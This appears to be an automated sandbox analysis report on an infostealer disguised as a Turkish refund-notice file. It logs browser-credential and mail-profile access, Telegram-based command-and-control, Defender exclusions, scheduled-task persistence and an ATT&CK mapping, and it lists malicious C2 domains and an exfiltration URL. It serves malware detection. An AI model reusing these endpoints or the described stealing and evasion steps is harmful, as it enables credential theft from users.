                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Users\user\AppData\Roaming\SOFcFE.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Users\user\AppData\Roaming\SOFcFE.exe VolumeInformation
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 7220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR
                Source: Yara matchFile source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 7220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0000000E.00000002.3763226390.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3763196888.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3760065848.0000000000436000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 7220, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR
                Source: Yara matchFile source: 20.2.SOFcFE.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4475780.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4431b60.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.4926f20.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4475780.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 16.2.SOFcFE.exe.4431b60.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.GeriOdemeBildirimi942.rar.xlxs.pdf.exe.478ac68.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3763226390.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3763196888.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000014.00000002.3760059045.0000000000435000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000010.00000002.1452643874.0000000004431000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1361445588.00000000046FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SOFcFE.exe PID: 7664, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                11
                Disable or Modify Tools
                1
                OS Credential Dumping
                1
                File and Directory Discovery
                Remote Services11
                Archive Collected Data
                1
                Web Service
                1
                Exfiltration Over Alternative Protocol
                Abuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                Scheduled Task/Job
                111
                Process Injection
                1
                Deobfuscate/Decode Files or Information
                LSASS Memory13
                System Information Discovery
                Remote Desktop Protocol1
                Data from Local System
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job
                3
                Obfuscated Files or Information
                Security Account Manager11
                Security Software Discovery
                SMB/Windows Admin Shares1
                Email Collection
                11
                Encrypted Channel
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture1
                Non-Standard Port
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Timestomp
                LSA Secrets31
                Virtualization/Sandbox Evasion
                SSHKeylogging3
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input Capture24
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading
                DCSync1
                System Network Configuration Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                Process Injection
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1524790 Sample: GeriOdemeBildirimi942.rar.x... Startdate: 03/10/2024 Architecture: WINDOWS Score: 100 46 reallyfreegeoip.org 2->46 48 api.telegram.org 2->48 50 3 other IPs or domains 2->50 58 Suricata IDS alerts for network traffic 2->58 60 Found malware configuration 2->60 62 Malicious sample detected (through community Yara rule) 2->62 68 15 other signatures 2->68 8 GeriOdemeBildirimi942.rar.xlxs.pdf.exe 7 2->8         started        12 SOFcFE.exe 5 2->12         started        signatures3 64 Tries to detect the country of the analysis system (by using the IP) 46->64 66 Uses the Telegram API (likely for C&C communication) 48->66 process4 file5 38 C:\Users\user\AppData\Roaming\SOFcFE.exe, PE32 8->38 dropped 40 C:\Users\user\...\SOFcFE.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\...\tmpF6B6.tmp, XML 8->42 dropped 44 GeriOdemeBildirimi...ar.xlxs.pdf.exe.log, ASCII 8->44 dropped 70 Uses schtasks.exe or at.exe to add and modify task schedules 8->70 72 Adds a directory exclusion to Windows Defender 8->72 74 Injects a PE file into a foreign processes 8->74 14 GeriOdemeBildirimi942.rar.xlxs.pdf.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        76 Multi AV Scanner detection for dropped file 12->76 78 Machine Learning detection for dropped file 12->78 24 SOFcFE.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 api.telegram.org 149.154.167.220, 443, 49729, 49747 TELEGRAMRU United Kingdom 14->52 54 awaratrendz.com 119.18.54.39, 21, 32582, 43366 PUBLIC-DOMAIN-REGISTRYUS India 14->54 56 3 other IPs or domains 14->56 80 Loading BitLocker PowerShell Module 18->80 28 WmiPrvSE.exe 18->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        82 Tries to steal Mail credentials (via file / registry access) 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 36 conhost.exe 26->36         started        signatures9 process10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                GeriOdemeBildirimi942.rar.xlxs.pdf.exe28%VirustotalBrowse
                GeriOdemeBildirimi942.rar.xlxs.pdf.exe50%ReversingLabsWin32.Infostealer.Generic
                GeriOdemeBildirimi942.rar.xlxs.pdf.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\SOFcFE.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\SOFcFE.exe50%ReversingLabsWin32.Infostealer.Generic
                No Antivirus matches
                SourceDetectionScannerLabelLink
                awaratrendz.com0%VirustotalBrowse
                reallyfreegeoip.org0%VirustotalBrowse
                api.telegram.org2%VirustotalBrowse
                checkip.dyndns.com0%VirustotalBrowse
                checkip.dyndns.org0%VirustotalBrowse
                SourceDetectionScannerLabelLink
                https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                http://checkip.dyndns.org0%URL Reputationsafe
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/8.46.123.330%URL Reputationsafe
                https://www.ecosia.org/newtab/0%URL Reputationsafe
                http://varders.kozow.com:80810%URL Reputationsafe
                http://aborters.duckdns.org:8081100%URL Reputationmalware
                https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                http://checkip.dyndns.org/0%URL Reputationsafe
                http://51.38.247.67:8081/_send_.php?L0%URL Reputationsafe
                https://reallyfreegeoip.org/xml/8.46.123.33$0%URL Reputationsafe
                http://anotherarmy.dns.army:8081100%URL Reputationmalware
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
